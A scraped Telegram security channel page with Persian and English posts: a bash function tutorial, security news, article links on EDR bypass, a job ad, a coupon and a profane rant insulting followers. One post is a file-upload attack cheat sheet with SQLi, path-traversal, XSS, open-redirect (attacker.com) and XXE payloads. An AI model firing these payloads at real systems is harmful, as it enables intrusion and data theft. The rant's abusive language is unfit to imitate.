Network Security Channel

前往频道在 Telegram

⭕️Start Channel From 2017⭕️ ✅ Security Operation Center (SOC) ✅ Bug Bounty ✅ Vulnerability ✅ Pentest ✅ Hardening ✅ Linux ✅ Reasearch ✅ Security Network ✅ Security Researcher ✅ DevSecOps ✅ Blue Team ✅ Red Team

显示更多

伊朗63 604 技术与应用26 745

2 780

订阅者

+424 小时

+187 天

+5130 天

409

帖子浏览量

~ 14224 小时

~ 19448 小时

14.71%

参与率

~ 1

每日帖子数

Ads index

beta

帖子存档

2 780

💠چگونه در زبان بش از یک تابع، یک مقدار را برگردانیم؟ مثال در python:

def add(x, y):
    return x + y

result = add(3, 4)

print(result)

خروجی کد بالا عدد ۷ خواهد بود. بش: (روش اول)

#!/bin/bash

add() {
    return $(($1 + $2))
}

add 3 4
result=$?

echo $result

روش دوم: (کوتاه‌تر)

#!/bin/bash

add() {
    echo $(($1 + $2))
}

add 3 4

توضیحات: در روش اول که کمی طولانی‌تره، ما میام خروجی تابع رو با استفاده از متغیر داخلی بش ?$ نمایش می‌دیم. این متغیر درواقع exit code دستور قبلی رو ذخیره می‌کنه. توابع در بش مقداری رو مثل پایتون برنمی‌گردونن و صرفا exit code که عددی بین ۰ تا ۲۵۵ است رو برمی‌گردونن. در تابع add، عبارت return درواقع باعث می‌شه که جمع آرگومان‌های تابع به‌عنوان exit status گزارش بشه. متغیر داخلی ?$ این exit status رو ذخیره می‌کنه، که می‌شه جمع ۳ و ۴ و عدد ۷ رو نمایش می‌ده. در مثال دوم که ساده‌تره و راحت‌تر هم هست ما پارامترهای 1$ و 2$ رو به تابع می‌دیم و از اونجایی که اکو در تابع تعریف شده، مقدار برگردانده می‌شه و در ترمینال چاپ میشه. @Engineer_Computer #آموزش #لینوکس #بش

2 780

Do you often wonder how to use PowerShell 7 in the server without switching to SSH-based remoting? https://awakecoding.com/posts/enable-powershell-winrm-remoting-in-powershell-7/ @Engineer_Computer

2 780

@Engineer_Computer

2 780

In today's world of expanding digital communications, APIs serve as crucial bridges between systems. Given their importance, defending APIs against attacks and malicious intrusions has become a key priority. Implementing advanced security protocols, robust authentication, and continuous monitoring are among the strategies that can ensure API security and protect sensitive data. @Engineer_Computer

2 780

🔴 خطر حمله RCE به میلیون‌ها دستگاه با آسیب‌پذیری‌های بحرانی OpenVPN محققان مایکروسافت به تازگی چندین آسیب‌پذیری با شدت متوسط و به بالا را در OpenVPN که یک نرم‌افزار متن‌باز VPN پرکاربرد است را کشف کرده‌اند. نرم‌افزار OpenVPN توسط هزاران شرکت در صنایع مختلف، از‌جمله فناوری اطلاعات، خدمات مالی، مخابرات و نرم‌افزار‌های کامپیوتری، بر روی پلتفرم‌های اصلی مانند Windows، iOS، macOS، Android و BSD استفاده می‌شود. این آسیب‌پذیری‌ها می‌توانند برای دستیابی به اجرای کد از راه دور (RCE) و افزایش اختیار محلی مورد سواستفاده قرار گیرند، که می‌تواند به مهاجمان اجازه دهد کنترل کامل دستگاه‌های هدف را به دست آورند. این امر خطر نقض داده‌ها، به خطر افتادن سیستم و دسترسی غیرمجاز به اطلاعات حساس را به همراه دارد. آسیب‌پذیری‌ها در معماری سمت سرویس گیرنده OpenVPN، به ویژه در مکانیسم ارتباطی بین فرآیند openvpn[.]exe و سرویس openvpnserv[.]exe شناسایی شدند. #Cybersecurity #Cyber_Attack #OpenVPN #RCE #DoS #VPN #Windows #Android #macOS #Vulnerability #امنیت_سایبری #حمله_سایبری #وی_پی_ان #ویندوز #مک @-Engineer_Computer

2 780

یک فریم ورک محبوب متن باز برای C2 ** فکر کنید حالا که EDR را دور می‌زند چه کنیم ؟ https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b @Engineer_Computer

2 780

MITRE research firm reveals alarming details about a recent cyber attack that dates back to late 2023. Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure. 🔗 Read details: https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html @Engineer_Computer

2 780

@Engineer_Computer #offensive

2 780

⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند. توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند. https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/ The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities. Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats. https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/ #LLM @Engineer_Computer

2 780

Chaining Vulnerabilities through File Upload SLQi

'sleep(20).jpg
sleep(25)-- -.jpg

Path traversal

../../etc/passwd/logo.png
../../../logo.png

XSS

->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open redirect

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

2 780

The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380) @Engineer_Computer

2 780

@Engineer_Computer

2 780

با ETW بصورت عمیق آشنا شوید https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/ @Engineer_Computer

2 780

#موقت Mastering of Python Script for System Administrator Coupon : 25FC2EF9F608AA536822 Link : https://www.udemy.com/course/mastering-of-python-script-for-system-administrator/?couponCode=25FC2EF9F608AA536822 @Engineer_Computer

2 780

سلام دوستان به صحبت دلی دارم در مورد عزیزانی که سیستم ندارن و میان پیش من میگن میخوایم امنیت یاد بگیریم شبکه یاد بگیریم میخوام استخدام شیم جاهای خوب بعد از کلی مشاوره و گرفتن وقت من و خودتون که ساعت ها رایگان طبق حس مثبتی که در این باب دارم انجام میدم بهم پیام میدین " دارم میرم کربلا و دعای خیر ما پشت سر شما هست " برادر من خواهر من تو سیستم نداری کار کنی ! بعد میری 30 میلیون میدی بری کربلا ؟؟ من نمیگم کربلا بده یا خوبه - به من ربطی نداره هر کسی اعتقادات خودشو داره وظیفهد همه مونم هست احترام بزاریم بهش ولی ادم چقدر گاو باشه !! که سیستم نداره ولی بره 30 میلیون بده برای کربلا یا هر سفر دیگه ... به نظرم یه جای کار میلنگه اونم اینکه به قول اوستامون گفت " تخم ادم خر کس ور نمیافته" واقعا بعضیا کسخلن و وقت مارم گرفتن ... ممنون

2 780

مقاله ی صبح شنبه دیتا مدل های کشف کاهش خطا در تحلیل های امنیتی **حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟ https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051 @Engineer_Computer

2 780

tools Red Team Tactics PenTest and Red Teams Tools https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations Cyber_Education Offensive security SQL Injection Cheatsheet https://tib3rius.com/sqli @Engineer_Computer

2 780

استفاده از درایور های آسیب پذیر ولی امضا دار برای دورزدن کنترل های امنیتی نظیر EDR مقاله ای خواندنی 👌 https://medium.com/@merasor07/byovd-a-kernel-attack-stealthy-threat-to-endpoint-security-ec809272e505 @Engineer_Computer

2 780

SOC Threat Intelligence Analyst Telecommute/home-based, Seeking a SOC Threat Intelligence Analyst for a contract role with a State Government organization in Des Moines, IA. Kindly review and let me know if you are interested in this opportunity. Role: SOC Threat Intelligence Analyst Location: Des Moines, IA - Remote Duration: Contractual Position Summary: This position supports the organization's Security Operations Center (SOC). The purpose of this p http://jobview.monster.com/SOC-Threat-Intelligence-Analyst-Job-US-275907401.aspx #US #SOC Threat Intelligence Analyst

2 780

سیگمای ۲ منتشر شد https://blog.sigmahq.io/introducing-sigma-specification-v2-0-25f81a926ff0 @Engineer_Computer